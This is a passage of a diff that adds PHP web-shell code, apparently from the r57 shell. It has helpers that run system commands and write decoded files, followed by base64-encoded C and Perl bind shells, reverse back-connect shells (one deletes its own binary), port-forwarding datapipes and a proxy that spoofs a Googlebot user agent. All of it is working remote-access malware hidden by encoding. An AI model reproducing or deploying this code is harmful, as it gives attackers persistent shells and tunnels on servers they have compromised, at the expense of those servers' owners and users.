"; } + $ret .= "value=\"".$value."\""; + if($checked) $ret .= " checked"; + return $ret.">"; +} +function which($pr) +{ +$path = ''; +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return false; } +} +function ps($pr) +{global $unix; +$path = ''; +if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");} +else{$path = ex("tasklist | findstr \"$pr\"");} +if(!empty($path)) { return $path; } else { return false; } +} +function locate($pr) +{ +$path = ''; +$path = ex("locate $pr"); +if(!empty($path)) { return $path; } else { return false; } +} +function cf($fname,$text) +{ + if(!morewrite($fname,@base64_decode($text))){err(0);}; +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." 
&& $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + 
if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; 
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd 
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA 
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC 
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn 
+luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT +0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE +UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09 +DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS +AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd +GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk +cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1 +BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi +AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK +TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg +eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA +oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG +VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI +CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt +b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN +0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG +9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ 
+CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g +aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw +gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG +9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0="; +$port_bind_bd_cs=""; +$back_connects="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"; 